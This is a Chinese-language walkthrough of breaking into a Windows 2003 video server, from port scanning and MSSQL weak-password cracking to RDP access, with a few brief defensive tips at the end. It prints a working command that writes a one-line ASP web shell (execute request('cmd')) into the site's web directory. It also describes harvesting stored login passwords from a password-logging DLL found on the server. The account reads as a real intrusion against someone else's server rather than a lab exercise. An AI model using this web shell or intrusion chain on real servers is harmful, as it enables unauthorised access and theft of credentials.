寻找漏洞

    我们找到一个目标。首先用工具扫描了一下，显示没有注入点，用Webtool只扫到了后台，也没发现社区程序，看来从网站下手不太可能了。再来看下系统的安全性怎么样，从IIS写权限扫描器的结果看不存在IIS写入漏洞，用Superscan刺探端口信息，如图1所示，居然开了3389。利用远程终端登录一下得知系统是Windows 2003系统，现在基本可以确定服务器的构架了：Windows 2003+IIS6.0+MSSQL+asp。

    再用极速MsSQL弱口令扫描器，挂上字典后开始扫描，过了几分钟扫描到了弱口令！，拿下服务器有一丝丝希望了，再拿出MsSQL连接器连接，连接成功。在MsSQL的中CMD中利用dir命令找到了Web目录，执行echo “<%execute request("cmd")%>”>>c:\"program files"\viewgood\webvod\webmedia\test.asp，建了一个一句话木马，断开连接，用一句话客户端连接，成功进入，可以浏览几乎所有文件，但很多目录没有写权限。查看了系统服务和端口，由于安装的东西太少了，没有Serv-u、PCAnywhere、Radmin等，提权又变得有点困难了。

成功入侵   

    在c:\Inetpub\下发现了NTpass.dll，这正是Goldsun写的记录系统登录密码的文件。来到这个程序记录信息存放的位置%systemroot%\system32\eulagold.txt（%systemroot%指系统目录，这里就该是c:\windows），用刚才的权限打开，发现里面记录了很多用户的登录密码，其中还有Guest用户，利用3389端口登录，得到桌面权限了。

    部署细节   

    这次的入侵看似更多的是运气，可仔细分析一下还是比较有价值的，尤其是对于用户对于服务器的安全部署很有借鉴意义。大体有以下几点：

    1.弱口令的防范

    2.服务器文件的常规检测

    3.对于用户的把控，尤其是视频服务器会提供web形式的会员形式，查看异常会员情况。

    4.必要端口的封锁